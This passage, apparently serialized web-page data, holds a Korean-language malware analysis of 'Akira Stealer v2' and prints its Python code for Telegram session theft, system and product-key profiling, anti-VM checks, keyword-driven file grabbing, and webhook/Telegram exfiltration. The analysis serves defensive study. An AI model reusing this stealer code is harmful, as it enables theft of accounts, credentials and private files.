os.path.join(Utils.get_temp_folder(), \"Telegram\"))\n",[578,9025,9026,9030,9035,9040,9045],{"__ignoreMap":530},[1706,9027,9028],{"class":1708,"line":1709},[1706,9029,5006],{},[1706,9031,9032],{"class":1708,"line":531},[1706,9033,9034],{},"def steal_telegram():\n",[1706,9036,9037],{"class":1708,"line":2091},[1706,9038,9039],{},"    src = f\"{os.getenv('APPDATA')}/Telegram Desktop/tdata\"\n",[1706,9041,9042],{"class":1708,"line":2097},[1706,9043,9044],{},"    Utils.TaskKill(\"telegram.exe\")\n",[1706,9046,9047],{"class":1708,"line":2419},[1706,9048,9049],{},"    shutil.copytree(src, os.path.join(Utils.get_temp_folder(), \"Telegram\"))\n",[630,9051,9052,9058,9067],{},[633,9053,9054,9057],{},[567,9055,9056],{},"프로세스 종료",": 파일 잠금이 해제되도록 보장합니다.",[633,9059,9060,9063,9064,9066],{},[567,9061,9062],{},"재귀적 복사",": 사용자 세션, 연락처, 캐시된 메시지를 포함한 ",[578,9065,8300],{}," 폴더를 탈취합니다.",[633,9068,9069,9071,9072,9075],{},[567,9070,1360],{},": 탈취된 폴더는 압축되어 ",[578,9073,9074],{},"sendFilesTG()","를 통해 업로드되며, 다운로드 링크가 Telegram 메시지에 삽입됩니다.",[526,9077,9078,9079,9081],{},"Akira Stealer의 ",[578,9080,1344],{}," 모듈은 정규식 기반 긁어오기, DPAPI 기반 AES-GCM 복호화, 라이브 API 검증, 다중 프로토콜 유출(웹훅 + Telegram)을 결합하여 Discord와 Telegram 플랫폼 전반에 걸쳐 원활한 계정 탈취 기능을 제공합니다.",[740,9083,9085],{"id":9084},"_710-시스템-프로파일링","7.10 시스템 프로파일링",[526,9087,746],{},[526,9089,9090,9091,9094],{},"Akira Stealer v2는 호스트 메타데이터, 환경 속성, 네트워크 세부 정보를 수집하는 광범위한 시스템 프로파일링 단계를 통합합니다. 이 정보는 ",[578,9092,9093],{},"Data"," 클래스에 취합되어 이후 유출된 자격 증명과 함께 패키징됩니다. 아래에서는 직접적인 코드 참조와 함께 프로파일링 로직을 분해합니다.",[888,9096,9098,9099,9101],{"id":9097},"_7101-data-클래스-초기화","7.10.1 ",[578,9100,9093],{}," 클래스 초기화",[526,9103,894],{},[526,9105,9106,9107,9109],{},"시작 시 ",[578,9108,9093],{},"의 인스턴스가 생성됩니다:",[615,9111,9113],{"className":4515,"code":9112,"language":4517,"meta":530,"style":530},"class Data:\n    def __init__(self):\n        self.username = os.getlogin()\n        self.computerName = os.getenv(\"computername\") or \"Unable to get computer name\"\n        self.system_info = f\"Computer Name: {self.computerName}\\n...\"\n        ...\n        self.ip = requests.get(url=\"https://api.ipify.org\").text\n        ipdata = json.loads(requests.post(url=f\"http://ip-api.com/json/{self.ip}\").text)\n        self.country = ipdata.get(\"country\")\n        self.countryCode = ipdata.get(\"countryCode\", \"\").lower()\n",[578,9114,9115,9120,9125,9130,9135,9140,9145,9150,9155,9160],{"__ignoreMap":530},[1706,9116,9117],{"class":1708,"line":1709},[1706,9118,9119],{},"class Data:\n",[1706,9121,9122],{"class":1708,"line":531},[1706,9123,9124],{},"    def __init__(self):\n",[1706,9126,9127],{"class":1708,"line":2091},[1706,9128,9129],{},"        self.username = os.getlogin()\n",[1706,9131,9132],{"class":1708,"line":2097},[1706,9133,9134],{},"        self.computerName = os.getenv(\"computername\") or \"Unable to get computer name\"\n",[1706,9136,9137],{"class":1708,"line":2419},[1706,9138,9139],{},"        self.system_info = f\"Computer Name: {self.computerName}\\n...\"\n",[1706,9141,9142],{"class":1708,"line":2425},[1706,9143,9144],{},"        ...\n",[1706,9146,9147],{"class":1708,"line":3081},[1706,9148,9149],{},"        self.ip = requests.get(url=\"https://api.ipify.org\").text\n",[1706,9151,9152],{"class":1708,"line":3874},[1706,9153,9154],{},"        ipdata = json.loads(requests.post(url=f\"http://ip-api.com/json/{self.ip}\").text)\n",[1706,9156,9157],{"class":1708,"line":3880},[1706,9158,9159],{},"        self.country = ipdata.get(\"country\")\n",[1706,9161,9162],{"class":1708,"line":4129},[1706,9163,9164],{},"        self.countryCode = ipdata.get(\"countryCode\", \"\").lower()\n",[630,9166,9167,9180],{},[633,9168,9169,3282,9172,9175,9176,9179],{},[567,9170,9171],{},"사용자명 및 호스트명:",[578,9173,9174],{},"os.getlogin()","과 ",[578,9177,9178],{},"COMPUTERNAME"," 환경 변수를 통해 회수됩니다.",[633,9181,9182,3282,9185,9188,9189,9191],{},[567,9183,9184],{},"IP 주소:",[578,9186,9187],{},"requests.get(\"https://api.ipify.org\")","로 가져온 뒤, ",[578,9190,5351],{},"을 통해 국가 및 ISO 코드로 지오로케이션합니다.",[888,9193,9195],{"id":9194},"_7102-os-및-하드웨어-열거","7.10.2 OS 및 하드웨어 열거",[526,9197,894],{},[526,9199,9200],{},"Windows Management Instrumentation(WMI) 명령을 사용:",[615,9202,9204],{"className":4515,"code":9203,"language":4517,"meta":530,"style":530},"# Operating System\nself.computerOS = subprocess.run('wmic os get Caption', shell=True, capture_output=True).stdout\n# Total Physical Memory\nself.totalMemory = subprocess.run('wmic computersystem get totalphysicalmemory', ...)\n# BIOS UUID\nself.uuid = subprocess.run('wmic csproduct get uuid', ...)\n# CPU Identifier\nself.cpu = subprocess.run(\"powershell Get-ItemPropertyValue -Path 'HKLM:System...\\Processor_Identifier'\", ...)\n# GPU Name\nself.gpu = subprocess.run('wmic path win32_VideoController get name', ...)\n# Windows Product Key\nself.productKey = subprocess.run(\"powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\\\\Microsoft\\\\Windows NT...SoftwareProtectionPlatform' -Name BackupProductKeyDefault\", ...)\n",[578,9205,9206,9211,9216,9221,9226,9231,9236,9241,9246,9251,9256,9261],{"__ignoreMap":530},[1706,9207,9208],{"class":1708,"line":1709},[1706,9209,9210],{},"# Operating System\n",[1706,9212,9213],{"class":1708,"line":531},[1706,9214,9215],{},"self.computerOS = subprocess.run('wmic os get Caption', shell=True, capture_output=True).stdout\n",[1706,9217,9218],{"class":1708,"line":2091},[1706,9219,9220],{},"# Total Physical Memory\n",[1706,9222,9223],{"class":1708,"line":2097},[1706,9224,9225],{},"self.totalMemory = subprocess.run('wmic computersystem get totalphysicalmemory', ...)\n",[1706,9227,9228],{"class":1708,"line":2419},[1706,9229,9230],{},"# BIOS UUID\n",[1706,9232,9233],{"class":1708,"line":2425},[1706,9234,9235],{},"self.uuid = subprocess.run('wmic csproduct get uuid', ...)\n",[1706,9237,9238],{"class":1708,"line":3081},[1706,9239,9240],{},"# CPU Identifier\n",[1706,9242,9243],{"class":1708,"line":3874},[1706,9244,9245],{},"self.cpu = subprocess.run(\"powershell Get-ItemPropertyValue -Path 'HKLM:System...\\Processor_Identifier'\", ...)\n",[1706,9247,9248],{"class":1708,"line":3880},[1706,9249,9250],{},"# GPU Name\n",[1706,9252,9253],{"class":1708,"line":4129},[1706,9254,9255],{},"self.gpu = subprocess.run('wmic path win32_VideoController get name', ...)\n",[1706,9257,9258],{"class":1708,"line":5054},[1706,9259,9260],{},"# Windows Product Key\n",[1706,9262,9263],{"class":1708,"line":5060},[1706,9264,9265],{},"self.productKey = subprocess.run(\"powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\\\\Microsoft\\\\Windows NT...SoftwareProtectionPlatform' -Name BackupProductKeyDefault\", ...)\n",[526,9267,9268,9269,9272],{},"결과는 사람이 읽을 수 있는 문자열로 파싱되고(",[578,9270,9271],{},"strip()",", 인덱스 연산) 다음으로 연결됩니다:",[615,9274,9276],{"className":4515,"code":9275,"language":4517,"meta":530,"style":530},"self.system_info = (\n    f\"Computer Name: {self.computerName}\\n\"\n    f\"Total Memory: {self.totalMemory}\\n\"\n    f\"CPU: {self.cpu}\\n\"\n    f\"GPU: {self.gpu}\\n\"\n    f\"Product Key: {self.productKey}\"\n)\n",[578,9277,9278,9283,9288,9293,9298,9303,9308],{"__ignoreMap":530},[1706,9279,9280],{"class":1708,"line":1709},[1706,9281,9282],{},"self.system_info = (\n",[1706,9284,9285],{"class":1708,"line":531},[1706,9286,9287],{},"    f\"Computer Name: {self.computerName}\\n\"\n",[1706,9289,9290],{"class":1708,"line":2091},[1706,9291,9292],{},"    f\"Total Memory: {self.totalMemory}\\n\"\n",[1706,9294,9295],{"class":1708,"line":2097},[1706,9296,9297],{},"    f\"CPU: {self.cpu}\\n\"\n",[1706,9299,9300],{"class":1708,"line":2419},[1706,9301,9302],{},"    f\"GPU: {self.gpu}\\n\"\n",[1706,9304,9305],{"class":1708,"line":2425},[1706,9306,9307],{},"    f\"Product Key: {self.productKey}\"\n",[1706,9309,9310],{"class":1708,"line":3081},[1706,9311,5272],{},[888,9313,9315],{"id":9314},"_7103-vm-탐지-및-안티-샌드박스-검사","7.10.3 VM 탐지 및 안티 샌드박스 검사",[526,9317,894],{},[526,9319,9320,9321,9323],{},"심층 프로파일링 전에, 멀웨어는 ",[578,9322,4687],{},"을 호출하여 가상화나 분석 환경을 탐지합니다:",[615,9325,9327],{"className":4515,"code":9326,"language":4517,"meta":530,"style":530},"if VmProtect.isVM(1):\n    sys.exit()\n",[578,9328,9329,9334],{"__ignoreMap":530},[1706,9330,9331],{"class":1708,"line":1709},[1706,9332,9333],{},"if VmProtect.isVM(1):\n",[1706,9335,9336],{"class":1708,"line":531},[1706,9337,9338],{},"    sys.exit()\n",[526,9340,9341],{},"주요 검사 항목:",[630,9343,9344,9350,9356,9362],{},[633,9345,9346,9349],{},[567,9347,9348],{},"레지스트리 키 및 드라이버 디스크립터",": 가상화 관련 레지스트리 항목을 조회합니다.",[633,9351,9352,9355],{},[567,9353,9354],{},"블랙리스트 UUID 및 컴퓨터 이름",": 알려진 VM 지문과 대조합니다.",[633,9357,9358,9361],{},[567,9359,9360],{},"HTTP 시뮬레이션",": HTTPS로 존재하지 않는 도메인에 연결을 시도합니다.",[633,9363,9364,1001,9367,646,9370,646,9373,9376],{},[567,9365,9366],{},"프로세스 블랙리스트",[578,9368,9369],{},"wireshark",[578,9371,9372],{},"ollydbg",[578,9374,9375],{},"ida64"," 같은 도구를 종료하는 백그라운드 스레드를 생성합니다.",[888,9378,9380],{"id":9379},"_7104-패키징-및-전송","7.10.4 패키징 및 전송",[526,9382,894],{},[526,9384,9385,9386,9389],{},"수집된 ",[578,9387,9388],{},"system_info",", IP, 국가 플래그는 웹훅 페이로드 헤더에 삽입됩니다:",[615,9391,9393],{"className":4515,"code":9392,"language":4517,"meta":530,"style":530},"webhook_payload = {\n    \"embeds\": [{\n        \"title\": f\"💉 Infected {self.computerName}/{self.username} | {self.ip} {flag}\",\n        \"description\": description + \"\\n```⚙️ System Info\\n\" + self.system_info + \"```\",\n        \"fields\": [...]\n    }]\n}\nrequests.post(self.webhook_url, json=webhook_payload)\n",[578,9394,9395,9400,9405,9410,9415,9420,9425,9429],{"__ignoreMap":530},[1706,9396,9397],{"class":1708,"line":1709},[1706,9398,9399],{},"webhook_payload = {\n",[1706,9401,9402],{"class":1708,"line":531},[1706,9403,9404],{},"    \"embeds\": [{\n",[1706,9406,9407],{"class":1708,"line":2091},[1706,9408,9409],{},"        \"title\": f\"💉 Infected {self.computerName}/{self.username} | {self.ip} {flag}\",\n",[1706,9411,9412],{"class":1708,"line":2097},[1706,9413,9414],{},"        \"description\": description + \"\\n```⚙️ System Info\\n\" + self.system_info + \"```\",\n",[1706,9416,9417],{"class":1708,"line":2419},[1706,9418,9419],{},"        \"fields\": [...]\n",[1706,9421,9422],{"class":1708,"line":2425},[1706,9423,9424],{},"    }]\n",[1706,9426,9427],{"class":1708,"line":3081},[1706,9428,2428],{},[1706,9430,9431],{"class":1708,"line":3874},[1706,9432,9433],{},"requests.post(self.webhook_url, json=webhook_payload)\n",[630,9435,9436,9442],{},[633,9437,9438,9441],{},[567,9439,9440],{},"플래그 이모지",": ISO 국가 코드에서 파생됩니다.",[633,9443,9444,9447],{},[567,9445,9446],{},"필드",": 탈취된 암호, 쿠키 등의 개수를 포함하지만, 시스템 정보는 즉각적인 맥락을 위해 임베드 설명에 담깁니다.",[526,9449,9450,9453],{},[567,9451,9452],{},"요약:","\nAkira Stealer v2의 시스템 프로파일링은 WMI 명령, 환경 변수, IP 지오로케이션을 통해 포괄적인 호스트 및 네트워크 데이터를 수집합니다. VM 탐지 및 도구 종료 루틴과 결합되어, 이는 공격자가 침해된 환경의 완전한 스냅샷을 확보하도록 보장하여, 표적화된 후속 조치를 강화하고 분석 샌드박스를 걸러냅니다.",[740,9455,9457,9458,2040],{"id":9456},"_711-파일-그래버클래스-utilssteal_files","7.11 파일 그래버(클래스: ",[578,9459,9460],{},"Utils.steal_files",[526,9462,746],{},[526,9464,9465],{},"브라우저 데이터와 토큰을 넘어, Akira는 문서, 스프레드시트, 개인 메모, 암호화 키 파일 같은 가치 있는 사용자 생성 콘텐츠도 추출하려고 시도합니다. 파일 그래버 모듈이 이 작업을 담당합니다. 흔한 파일 유형과 패턴을 찾아 고가치 디렉터리를 스캔한 뒤, 이를 조용히 유출 번들에 추가하는 방식으로 작동합니다. 이 모듈을 특히 위험하게 만드는 것은 그 단순함과 집중력입니다. 전체 파일 시스템을 크롤링하려 하지 않고, 민감한 파일이 일반적으로 저장되는 특정 고확률 위치를 겨냥합니다. 여기에는 사용자의 홈 경로를 기준으로 한 Desktop, Documents, Downloads, OneDrive 디렉터리가 포함됩니다. 이 집중된 접근은 속도와 은닉성을 모두 향상시켜, 스캔 중 탐지 가능성을 줄입니다. 또한 시스템이나 보호된 디렉터리에 접근하지 않음으로써 사용자에게 경고를 주지 않습니다. 관심 있는 파일이 발견되면, 임시 폴더로 복사되고, 선택적으로 이름이 변경되거나 그룹화되며, 이후 유출 단계에서 업로드되는 최종 ZIP 아카이브로 압축됩니다.",[888,9467,9469],{"id":9468},"_7111-대상-디렉터리-열거","7.11.1 대상 디렉터리 열거",[526,9471,894],{},[526,9473,9474],{},"스틸러는 네 개의 고수확 폴더에 초점을 맞춥니다:",[615,9476,9478],{"className":4515,"code":9477,"language":4517,"meta":530,"style":530},"searchFolders = [\n    \"Desktop\",\n    \"Documents\",\n    \"Downloads\",\n    \"OneDrive\"\n]\n",[578,9479,9480,9485,9490,9495,9500,9505],{"__ignoreMap":530},[1706,9481,9482],{"class":1708,"line":1709},[1706,9483,9484],{},"searchFolders = [\n",[1706,9486,9487],{"class":1708,"line":531},[1706,9488,9489],{},"    \"Desktop\",\n",[1706,9491,9492],{"class":1708,"line":2091},[1706,9493,9494],{},"    \"Documents\",\n",[1706,9496,9497],{"class":1708,"line":2097},[1706,9498,9499],{},"    \"Downloads\",\n",[1706,9501,9502],{"class":1708,"line":2419},[1706,9503,9504],{},"    \"OneDrive\"\n",[1706,9506,9507],{"class":1708,"line":2425},[1706,9508,7947],{},[526,9510,9511],{},"각 폴더는 피해자의 홈 디렉터리를 기준으로 해석됩니다:",[615,9513,9515],{"className":4515,"code":9514,"language":4517,"meta":530,"style":530},"for folder in searchFolders:\n    current_path = os.path.join(os.environ['USERPROFILE'], folder)\n    if os.path.exists(current_path):\n        # proceed to scan\n",[578,9516,9517,9522,9527,9532],{"__ignoreMap":530},[1706,9518,9519],{"class":1708,"line":1709},[1706,9520,9521],{},"for folder in searchFolders:\n",[1706,9523,9524],{"class":1708,"line":531},[1706,9525,9526],{},"    current_path = os.path.join(os.environ['USERPROFILE'], folder)\n",[1706,9528,9529],{"class":1708,"line":2091},[1706,9530,9531],{},"    if os.path.exists(current_path):\n",[1706,9533,9534],{"class":1708,"line":2097},[1706,9535,9536],{},"        # proceed to scan\n",[888,9538,9540],{"id":9539},"_7112-키워드-및-확장자-필터링","7.11.2 키워드 및 확장자 필터링",[526,9542,894],{},[526,9544,9545],{},[567,9546,9547],{},"키워드 목록",[526,9549,9550],{},"사전 정의된 부분 문자열 집합이 파일 선택을 안내합니다. 하나 이상의 키워드를 포함하는 파일명만 고려됩니다:",[615,9552,9554],{"className":4515,"code":9553,"language":4517,"meta":530,"style":530},"keywordsFiles = [\n    \"passw\", \"seed\", \"mnemo\", \"phrase\", \"login\", \"wallet\",\n    \"crypto\", \"token\", \"backup\", \"secret\", \"account\"\n]\n",[578,9555,9556,9561,9566,9571],{"__ignoreMap":530},[1706,9557,9558],{"class":1708,"line":1709},[1706,9559,9560],{},"keywordsFiles = [\n",[1706,9562,9563],{"class":1708,"line":531},[1706,9564,9565],{},"    \"passw\", \"seed\", \"mnemo\", \"phrase\", \"login\", \"wallet\",\n",[1706,9567,9568],{"class":1708,"line":2091},[1706,9569,9570],{},"    \"crypto\", \"token\", \"backup\", \"secret\", \"account\"\n",[1706,9572,9573],{"class":1708,"line":2097},[1706,9574,7947],{},[630,9576,9577,9593],{},[633,9578,9579,1001,9582,9585,9586,585,9589,9592],{},[567,9580,9581],{},"부분 일치",[578,9583,9584],{},"passw"," 같은 키워드는 ",[578,9587,9588],{},"passwords.txt",[578,9590,9591],{},"passw_backup.docx","를 모두 캡처합니다.",[633,9594,9595,9598],{},[567,9596,9597],{},"광범위한 커버리지",": 인증, 지갑, 암호화폐, 토큰 관련 용어를 포괄합니다.",[888,9600,9602],{"id":9601},"_7113-허용된-파일-유형","7.11.3 허용된 파일 유형",[526,9604,894],{},[526,9606,9607],{},"노이즈를 최소화하기 위해, 확장자 화이트리스트가 적용됩니다:",[615,9609,9611],{"className":4515,"code":9610,"language":4517,"meta":530,"style":530},"allowed_extensions = [\n    \".txt\", \".doc\", \".docx\", \".pdf\", \".csv\", \".xls\", \".xlsx\",\n    \".jpg\", \".png\"\n]\n",[578,9612,9613,9618,9623,9628],{"__ignoreMap":530},[1706,9614,9615],{"class":1708,"line":1709},[1706,9616,9617],{},"allowed_extensions = [\n",[1706,9619,9620],{"class":1708,"line":531},[1706,9621,9622],{},"    \".txt\", \".doc\", \".docx\", \".pdf\", \".csv\", \".xls\", \".xlsx\",\n",[1706,9624,9625],{"class":1708,"line":2091},[1706,9626,9627],{},"    \".jpg\", \".png\"\n",[1706,9629,9630],{"class":1708,"line":2097},[1706,9631,7947],{},[888,9633,9635],{"id":9634},"_7113-크기-제약","7.11.3 크기 제약",[526,9637,894],{},[526,9639,9640],{},"유출 속도를 최적화하고 대용량 전송을 피하기 위해, 2메가바이트보다 큰 파일은 건너뜁니다:",[615,9642,9644],{"className":4515,"code":9643,"language":4517,"meta":530,"style":530},"file_size_mb = os.path.getsize(full_path) / (1024 * 1024)\nif file_size_mb \u003C= 2:\n    # eligible for copy\n",[578,9645,9646,9651,9656],{"__ignoreMap":530},[1706,9647,9648],{"class":1708,"line":1709},[1706,9649,9650],{},"file_size_mb = os.path.getsize(full_path) / (1024 * 1024)\n",[1706,9652,9653],{"class":1708,"line":531},[1706,9654,9655],{},"if file_size_mb \u003C= 2:\n",[1706,9657,9658],{"class":1708,"line":2091},[1706,9659,9660],{},"    # eligible for copy\n",[888,9662,9664],{"id":9663},"_7114-재귀적-스캐닝-및-복사-로직","7.11.4 재귀적 스캐닝 및 복사 로직",[526,9666,894],{},[526,9668,9669],{},"고가치 디렉터리가 식별되면, Akira는 재귀적 스캐닝 루틴을 개시하여 하위 폴더를 순회하고 특정 키워드와 확장자에 일치하는 파일을 찾습니다. 이 단계는 정밀성과 은닉성을 위해 설계되었습니다. 민감한 키워드를 포함하는 파일명과 승인된 파일 유형 같은 사전 정의된 기준에 일치하는 파일만 고려됩니다. 이 로직은 관련성 있는 사용자 생성 콘텐츠만 유출되도록 보장합니다. 시스템 파일, 캐시, 바이너리를 무시하고, 업로드 크기와 탐지 위험을 줄이기 위해 단일 파일 크기를 2 MB로 제한합니다. 이 스캐닝 방법은 조용하고 효율적이며, 실제 환경에서의 은밀한 데이터 탈취에 최적화되어 있습니다. 일치하는 파일을 스테이징 폴더로 복사하고 탈취한 목록을 유지함으로써, Akira는 중복과 운영 노이즈를 최소화하면서 콘텐츠를 번들링과 유출을 위해 준비합니다.",[526,9671,9672,9673,9676],{},"핵심 루틴 ",[578,9674,9675],{},"steal_files()","는 다음과 같이 작동합니다:",[615,9678,9680],{"className":4515,"code":9679,"language":4517,"meta":530,"style":530},"@staticmethod\ndef steal_files():\n    stolen_files = set()\n    temp_folder = Utils.get_temp_folder()\n\n    for folder in searchFolders:\n        current_path = os.path.join(os.environ['USERPROFILE'], folder)\n        if os.path.exists(current_path):\n            for root, _, files in os.walk(current_path):\n                for file in files:\n                    lower = file.lower()\n                    # Keyword check\n                    if any(keyword in lower for keyword in keywordsFiles):\n                        ext = os.path.splitext(lower)[1]\n                        # Extension and size check\n                        if ext in allowed_extensions and os.path.getsize(os.path.join(root, file)) \u003C= 2 * 1024 * 1024:\n                            # Prepare destination\n                            files_dir = os.path.join(temp_folder, \"Files\")\n                            os.makedirs(files_dir, exist_ok=True)\n                            shutil.copy(os.path.join(root, file), os.path.join(files_dir, file))\n                            stolen_files.add(file)\n    data.stolen_files.extend(stolen_files)\n",[578,9681,9682,9686,9691,9696,9701,9705,9710,9715,9720,9725,9730,9735,9740,9745,9750,9755,9760,9765,9770,9775,9780,9785],{"__ignoreMap":530},[1706,9683,9684],{"class":1708,"line":1709},[1706,9685,5006],{},[1706,9687,9688],{"class":1708,"line":531},[1706,9689,9690],{},"def steal_files():\n",[1706,9692,9693],{"class":1708,"line":2091},[1706,9694,9695],{},"    stolen_files = set()\n",[1706,9697,9698],{"class":1708,"line":2097},[1706,9699,9700],{},"    temp_folder = Utils.get_temp_folder()\n",[1706,9702,9703],{"class":1708,"line":2419},[1706,9704,3871],{"emptyLinePlaceholder":325},[1706,9706,9707],{"class":1708,"line":2425},[1706,9708,9709],{},"    for folder in searchFolders:\n",[1706,9711,9712],{"class":1708,"line":3081},[1706,9713,9714],{},"        current_path = os.path.join(os.environ['USERPROFILE'], folder)\n",[1706,9716,9717],{"class":1708,"line":3874},[1706,9718,9719],{},"        if os.path.exists(current_path):\n",[1706,9721,9722],{"class":1708,"line":3880},[1706,9723,9724],{},"            for root, _, files in os.walk(current_path):\n",[1706,9726,9727],{"class":1708,"line":4129},[1706,9728,9729],{},"                for file in files:\n",[1706,9731,9732],{"class":1708,"line":5054},[1706,9733,9734],{},"                    lower = file.lower()\n",[1706,9736,9737],{"class":1708,"line":5060},[1706,9738,9739],{},"                    # Keyword check\n",[1706,9741,9742],{"class":1708,"line":5066},[1706,9743,9744],{},"                    if any(keyword in lower for keyword in keywordsFiles):\n",[1706,9746,9747],{"class":1708,"line":5072},[1706,9748,9749],{},"                        ext = os.path.splitext(lower)[1]\n",[1706,9751,9752],{"class":1708,"line":5078},[1706,9753,9754],{},"                        # Extension and size check\n",[1706,9756,9757],{"class":1708,"line":5084},[1706,9758,9759],{},"                        if ext in allowed_extensions and os.path.getsize(os.path.join(root, file)) \u003C= 2 * 1024 * 1024:\n",[1706,9761,9762],{"class":1708,"line":5090},[1706,9763,9764],{},"                            # Prepare destination\n",[1706,9766,9767],{"class":1708,"line":5096},[1706,9768,9769],{},"                            files_dir = os.path.join(temp_folder, \"Files\")\n",[1706,9771,9772],{"class":1708,"line":5102},[1706,9773,9774],{},"                            os.makedirs(files_dir, exist_ok=True)\n",[1706,9776,9777],{"class":1708,"line":5108},[1706,9778,9779],{},"                            shutil.copy(os.path.join(root, file), os.path.join(files_dir, file))\n",[1706,9781,9782],{"class":1708,"line":5114},[1706,9783,9784],{},"                            stolen_files.add(file)\n",[1706,9786,9787],{"class":1708,"line":5120},[1706,9788,9789],{},"    data.stolen_files.extend(stolen_files)\n",[526,9791,9792],{},[567,9793,9794],{},"핵심 포인트:",[2105,9796,9797,9805,9815,9823,9829],{},[633,9798,9799,9804],{},[567,9800,9801],{},[578,9802,9803],{},"os.walk",": 하위 디렉터리로 재귀적으로 내려갑니다.",[633,9806,9807,9810,9811,9814],{},[567,9808,9809],{},"대소문자 구분 없는 매칭",": 파일명은 ",[578,9812,9813],{},"lower()","를 통해 정규화됩니다.",[633,9816,9817,1001,9820,9822],{},[567,9818,9819],{},"원자적 복사",[578,9821,7813],{},"를 사용해 파일 내용을 보존합니다.",[633,9824,9825,9828],{},[567,9826,9827],{},"탈취된 파일명 집합",": 동일한 파일이 두 번 나타날 때 중복 복사를 방지합니다.",[633,9830,9831,1001,9836,9839],{},[567,9832,9833,9835],{},[578,9834,9093],{},"와의 통합",[578,9837,9838],{},"data.stolen_files","가 이후 보고를 위해 탈취된 파일 목록을 축적합니다.",[888,9841,9843],{"id":9842},"_7115-아카이빙-및-유출","7.11.5 아카이빙 및 유출",[526,9845,894],{},[526,9847,9848,9849,9852],{},"수집 후, ",[578,9850,9851],{},"Files"," 폴더는 압축되어 전송됩니다:",[615,9854,9856],{"className":4515,"code":9855,"language":4517,"meta":530,"style":530},"# Archive\nUtils.zip_client_file()  # creates CLIENT.zip from temp_folder\n\n# Upload & Notify\nakira.sendFilesTG(Utils.get_temp_folder(), startup)\nhook.sendFilesTG(Utils.get_temp_folder(), startup)\n",[578,9857,9858,9863,9868,9872,9877,9882],{"__ignoreMap":530},[1706,9859,9860],{"class":1708,"line":1709},[1706,9861,9862],{},"# Archive\n",[1706,9864,9865],{"class":1708,"line":531},[1706,9866,9867],{},"Utils.zip_client_file()  # creates CLIENT.zip from temp_folder\n",[1706,9869,9870],{"class":1708,"line":2091},[1706,9871,3871],{"emptyLinePlaceholder":325},[1706,9873,9874],{"class":1708,"line":2097},[1706,9875,9876],{},"# Upload & Notify\n",[1706,9878,9879],{"class":1708,"line":2419},[1706,9880,9881],{},"akira.sendFilesTG(Utils.get_temp_folder(), startup)\n",[1706,9883,9884],{"class":1708,"line":2425},[1706,9885,9886],{},"hook.sendFilesTG(Utils.get_temp_folder(), startup)\n",[630,9888,9889,9904],{},[633,9890,9891,1001,9896,646,9898,646,9900,9903],{},[567,9892,9893],{},[578,9894,9895],{},"zip_client_file()",[578,9897,9851],{},[578,9899,6352],{},[578,9901,9902],{},"Passwords"," 등을 포함한 전체 임시 디렉터리를 압축합니다.",[633,9905,9906,9910,9911],{},[567,9907,9908],{},[578,9909,9074],{},": Telegram 또는 Discord 웹훅을 통해 다운로드 링크를 게시하며, 탈취된 각 파일명을 나열합니다:",[615,9912,9914],{"className":4515,"code":9913,"language":4517,"meta":530,"style":530},"fields.append({\n\"name\": \"📂 Files\",\n\"value\": \"`\" + \"\\n\".join(data.stolen_files) + \"`\",\n\"inline\": False\n})\n",[578,9915,9916,9921,9926,9931,9936],{"__ignoreMap":530},[1706,9917,9918],{"class":1708,"line":1709},[1706,9919,9920],{},"fields.append({\n",[1706,9922,9923],{"class":1708,"line":531},[1706,9924,9925],{},"\"name\": \"📂 Files\",\n",[1706,9927,9928],{"class":1708,"line":2091},[1706,9929,9930],{},"\"value\": \"`\" + \"\\n\".join(data.stolen_files) + \"`\",\n",[1706,9932,9933],{"class":1708,"line":2097},[1706,9934,9935],{},"\"inline\": False\n",[1706,9937,9938],{"class":1708,"line":2419},[1706,9939,9940],{},"})\n",[526,9942,9943],{},[567,9944,9945],{},"결론:",[526,9947,9948],{},"Akira Stealer v2의 파일 그래버는 키워드 및 확장자 필터를 사용해 민감한 문서를 체계적으로 사냥하고, 효율을 위해 2 MB 크기 상한을 준수하며, 탈취한 항목을 아카이브로 통합합니다. 그 설계는 넓이(여러 폴더)와 정밀성(표적 필터)을 모두 보장하여, 멀웨어 수명 주기에서 가장 영향력 있는 단계 중 하나로 만듭니다.",[740,9950,9952],{"id":9951},"_712-유출-전략","7.12 유출 전략",[526,9954,746],{},[526,9956,9957],{},"유출 모듈은 수집된 토큰과 추가 아티팩트(쿠키, 자동 완성, 로그)를 구조화된 디렉터리에 스테이징하고, 아카이브로 압축하며, 여러 온라인 파일 호스트에 업로드하고, 상세한 웹훅 알림을 전송하는 방식으로 처리합니다. 이 섹션은 완전한 추적성을 위해 파일 경로, 도메인 엔드포인트, 코드 참조와 함께 각 단계를 해체합니다.",[888,9959,9961],{"id":9960},"_7121-디렉터리-레이아웃-및-파일명","7.12.1 디렉터리 레이아웃 및 파일명",[526,9963,894],{},[526,9965,9966],{},"Akira는 수집된 모든 아티팩트를 깔끔하고 계층적인 임시 디렉터리 구조로 정리합니다. 이 설계는 효율적인 패키징과 공격자의 손쉬운 유출 후 검토를 가능하게 합니다. Tokens, Cookies, Passwords, Screenshots 같은 각 데이터 범주는 피해자의 컴퓨터 이름(예: DESKTOP1234)을 딴 루트 경로 아래 자체 하위 폴더에 저장됩니다. 이 구조화된 레이아웃은 명확성을 보장하고, 중복을 최소화하며, 아카이빙 및 업로드 과정을 간소화합니다. 또한 공격자 측에서 자동화된 파싱이나 수동 검사를 훨씬 쉽게 만듭니다.",[615,9968,9971],{"className":9969,"code":9970,"language":620},[618],"C:\\Users\\User\\AppData\\Local\\Temp\\DESKTOP1234\\\n├─ Tokens\\\n│   ├ token_ab12cd34.txt\n│   └ token_ef56gh78.txt\n├─ Cookies\\\n│   ├ Chrome_Cookies.txt\n│   └ Discord_Cookies.txt\n├─ Autofill\\\n├─ Passwords\\\n├─ Logs\\\n└─ Screenshots\\\n",[578,9972,9970],{"__ignoreMap":530},[888,9974,9976],{"id":9975},"_7122-토큰-및-아티팩트-스테이징","7.12.2 토큰 및 아티팩트 스테이징",[526,9978,894],{},[526,9980,9981],{},"유출 전, Akira는 관련된 모든 아티팩트를 해당 하위 폴더에 스테이징합니다. 예를 들어 토큰 값은 빠른 스캔과 검증을 용이하게 하기 위해 개별 .txt 파일에 기록됩니다. 쿠키, 자동 완성 항목, 암호도 마찬가지로 브라우저별로 명명된 구조화된 텍스트 파일에 기록됩니다. 이 단계는 데이터 레이아웃을 표준화하여, 자동화 도구가 무엇이 수집되었는지 추적할 수 있게 합니다. 또한 어떤 모듈이 트리거되었든 상관없이 ZIP 아카이브가 예측 가능하고 공격자 친화적인 형식을 반영하도록 